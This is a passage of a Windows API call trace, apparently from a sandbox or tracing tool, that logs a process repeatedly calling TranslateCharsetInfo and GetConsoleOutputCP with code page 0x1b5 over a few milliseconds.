[0085.921] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.921] GetConsoleOutputCP () returned 0x1b5
[0085.921] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.921] GetConsoleOutputCP () returned 0x1b5
[0085.921] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.921] GetConsoleOutputCP () returned 0x1b5
[0085.921] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.921] GetConsoleOutputCP () returned 0x1b5
[0085.922] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.922] GetConsoleOutputCP () returned 0x1b5
[0085.922] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.922] GetConsoleOutputCP () returned 0x1b5
[0085.922] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.922] GetConsoleOutputCP () returned 0x1b5
[0085.922] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.922] GetConsoleOutputCP () returned 0x1b5
[0085.922] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.922] GetConsoleOutputCP () returned 0x1b5
[0085.922] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.922] GetConsoleOutputCP () returned 0x1b5
[0085.922] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.922] GetConsoleOutputCP () returned 0x1b5
[0085.922] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.922] GetConsoleOutputCP () returned 0x1b5
[0085.922] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.922] GetConsoleOutputCP () returned 0x1b5
[0085.922] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.923] GetConsoleOutputCP () returned 0x1b5
[0085.923] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.923] GetConsoleOutputCP () returned 0x1b5
[0085.923] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.923] GetConsoleOutputCP () returned 0x1b5
[0085.923] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.923] GetConsoleOutputCP () returned 0x1b5
[0085.923] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.923] GetConsoleOutputCP () returned 0x1b5
[0085.923] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a1d0) returned 0
[0085.923] GetConsoleOutputCP () returned 0x1b5
[0085.923] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a1a0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a1a0) returned 0
[0085.923] GetConsoleOutputCP () returned 0x1b5
[0085.923] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a1a0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a1a0) returned 0
[0085.923] GetConsoleOutputCP () returned 0x1b5
[0085.923] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a1d0) returned 0
[0085.923] GetConsoleOutputCP () returned 0x1b5
[0085.923] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.923] GetConsoleOutputCP () returned 0x1b5
[0085.924] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.924] GetConsoleOutputCP () returned 0x1b5
[0085.924] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.924] GetConsoleOutputCP () returned 0x1b5
[0085.924] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.924] GetConsoleOutputCP () returned 0x1b5
[0085.924] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.924] GetConsoleOutputCP () returned 0x1b5
[0085.924] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.924] GetConsoleOutputCP () returned 0x1b5
[0085.924] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.924] GetConsoleOutputCP () returned 0x1b5
[0085.924] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.924] GetConsoleOutputCP () returned 0x1b5
[0085.924] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.924] GetConsoleOutputCP () returned 0x1b5
[0085.924] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.924] GetConsoleOutputCP () returned 0x1b5
[0085.924] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.925] GetConsoleOutputCP () returned 0x1b5
[0085.925] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.925] GetConsoleOutputCP () returned 0x1b5
[0085.925] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.925] GetConsoleOutputCP () returned 0x1b5
[0085.925] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.925] GetConsoleOutputCP () returned 0x1b5
[0085.925] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.925] GetConsoleOutputCP () returned 0x1b5
[0085.925] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.925] GetConsoleOutputCP () returned 0x1b5
[0085.925] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.925] GetConsoleOutputCP () returned 0x1b5
[0085.925] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.925] GetConsoleOutputCP () returned 0x1b5
[0085.925] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.925] GetConsoleOutputCP () returned 0x1b5
[0085.925] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.925] GetConsoleOutputCP () returned 0x1b5
[0085.926] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.926] GetConsoleOutputCP () returned 0x1b5
[0085.926] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.926] GetConsoleOutputCP () returned 0x1b5
[0085.926] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.926] GetConsoleOutputCP () returned 0x1b5
[0085.926] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.926] GetConsoleOutputCP () returned 0x1b5
[0085.926] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.926] GetConsoleOutputCP () returned 0x1b5
[0085.926] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.926] GetConsoleOutputCP () returned 0x1b5
[0085.926] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.926] GetConsoleOutputCP () returned 0x1b5
[0085.926] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.926] GetConsoleOutputCP () returned 0x1b5
[0085.926] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.926] GetConsoleOutputCP () returned 0x1b5
[0085.927] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.927] GetConsoleOutputCP () returned 0x1b5
[0085.927] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.927] GetConsoleOutputCP () returned 0x1b5
[0085.927] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.927] GetConsoleOutputCP () returned 0x1b5
[0085.927] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.927] GetConsoleOutputCP () returned 0x1b5
[0085.927] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.927] GetConsoleOutputCP () returned 0x1b5
[0085.927] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.927] GetConsoleOutputCP () returned 0x1b5
[0085.927] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.927] GetConsoleOutputCP () returned 0x1b5
[0085.927] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.927] GetConsoleOutputCP () returned 0x1b5
[0085.927] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.928] GetConsoleOutputCP () returned 0x1b5
[0085.928] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.928] GetConsoleOutputCP () returned 0x1b5
[0085.928] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.928] GetConsoleOutputCP () returned 0x1b5
[0085.928] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.928] GetConsoleOutputCP () returned 0x1b5
[0085.928] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.928] GetConsoleOutputCP () returned 0x1b5
[0085.928] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.928] GetConsoleOutputCP () returned 0x1b5
[0085.928] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.928] GetConsoleOutputCP () returned 0x1b5
[0085.928] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.928] GetConsoleOutputCP () returned 0x1b5
[0085.928] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.928] GetConsoleOutputCP () returned 0x1b5
[0085.928] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.928] GetConsoleOutputCP () returned 0x1b5
[0085.929] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.929] GetConsoleOutputCP () returned 0x1b5
[0085.929] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.929] GetConsoleOutputCP () returned 0x1b5
[0085.929] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.929] GetConsoleOutputCP () returned 0x1b5
[0085.929] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.929] GetConsoleOutputCP () returned 0x1b5
[0085.929] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.929] GetConsoleOutputCP () returned 0x1b5
[0085.929] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.929] GetConsoleOutputCP () returned 0x1b5
[0085.929] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.929] GetConsoleOutputCP () returned 0x1b5
[0085.929] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.929] GetConsoleOutputCP () returned 0x1b5
[0085.929] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.929] GetConsoleOutputCP () returned 0x1b5
[0085.930] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.930] GetConsoleOutputCP () returned 0x1b5
[0085.930] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.930] GetConsoleOutputCP () returned 0x1b5
[0085.930] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.930] GetConsoleOutputCP () returned 0x1b5
[0085.930] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.930] GetConsoleOutputCP () returned 0x1b5
[0085.930] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.930] GetConsoleOutputCP () returned 0x1b5
[0085.930] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.930] GetConsoleOutputCP () returned 0x1b5
[0085.930] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.930] GetConsoleOutputCP () returned 0x1b5
[0085.930] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.930] GetConsoleOutputCP () returned 0x1b5
[0085.930] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.930] GetConsoleOutputCP () returned 0x1b5
[0085.931] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.931] GetConsoleOutputCP () returned 0x1b5
[0085.931] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.931] GetConsoleOutputCP () returned 0x1b5
[0085.931] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.931] GetConsoleOutputCP () returned 0x1b5
[0085.931] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.931] GetConsoleOutputCP () returned 0x1b5
[0085.931] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.931] GetConsoleOutputCP () returned 0x1b5
[0085.931] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.931] GetConsoleOutputCP () returned 0x1b5
[0085.931] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.931] GetConsoleOutputCP () returned 0x1b5
[0085.931] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.931] GetConsoleOutputCP () returned 0x1b5
[0085.931] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.931] GetConsoleOutputCP () returned 0x1b5
[0085.932] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.932] GetConsoleOutputCP () returned 0x1b5
[0085.932] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.932] GetConsoleOutputCP () returned 0x1b5
[0085.932] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.932] GetConsoleOutputCP () returned 0x1b5
[0085.932] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.932] GetConsoleOutputCP () returned 0x1b5
[0085.932] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.932] GetConsoleOutputCP () returned 0x1b5
[0085.932] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a1d0) returned 0
[0085.932] GetConsoleOutputCP () returned 0x1b5
[0085.932] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.932] GetConsoleOutputCP () returned 0x1b5
[0085.932] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.932] GetConsoleOutputCP () returned 0x1b5
[0085.932] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.932] GetConsoleOutputCP () returned 0x1b5
[0085.932] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.933] GetConsoleOutputCP () returned 0x1b5
[0085.933] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.933] GetConsoleOutputCP () returned 0x1b5
[0085.933] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.933] GetConsoleOutputCP () returned 0x1b5
[0085.933] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.933] GetConsoleOutputCP () returned 0x1b5
[0085.933] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.933] GetConsoleOutputCP () returned 0x1b5
[0085.933] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.933] GetConsoleOutputCP () returned 0x1b5
[0085.933] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.933] GetConsoleOutputCP () returned 0x1b5
[0085.933] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.933] GetConsoleOutputCP () returned 0x1b5
[0085.933] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.933] GetConsoleOutputCP () returned 0x1b5
[0085.933] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.933] GetConsoleOutputCP () returned 0x1b5
[0085.934] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.934] GetConsoleOutputCP () returned 0x1b5
[0085.934] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.934] GetConsoleOutputCP () returned 0x1b5
[0085.934] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.934] GetConsoleOutputCP () returned 0x1b5
[0085.934] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.934] GetConsoleOutputCP () returned 0x1b5
[0085.934] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.934] GetConsoleOutputCP () returned 0x1b5
[0085.934] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.934] GetConsoleOutputCP () returned 0x1b5
[0085.934] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.934] GetConsoleOutputCP () returned 0x1b5
[0085.934] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.934] GetConsoleOutputCP () returned 0x1b5
[0085.934] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.934] GetConsoleOutputCP () returned 0x1b5
[0085.935] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.935] GetConsoleOutputCP () returned 0x1b5
[0085.935] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.935] GetConsoleOutputCP () returned 0x1b5
[0085.935] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.935] GetConsoleOutputCP () returned 0x1b5
[0085.935] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.935] GetConsoleOutputCP () returned 0x1b5
[0085.935] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.935] GetConsoleOutputCP () returned 0x1b5
[0085.935] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1c81a130, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1c81a130) returned 0
[0085.935] GetConsoleOutputCP () returned 0x1b5
